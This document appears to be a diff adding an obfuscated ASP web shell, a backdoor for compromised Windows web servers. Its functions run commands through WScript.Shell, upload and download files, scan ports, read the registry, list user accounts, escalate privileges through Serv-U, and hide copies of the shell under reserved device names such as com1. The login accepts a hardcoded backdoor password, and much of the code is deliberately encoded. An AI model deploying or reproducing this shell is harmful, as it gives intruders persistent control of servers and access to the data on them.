+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce 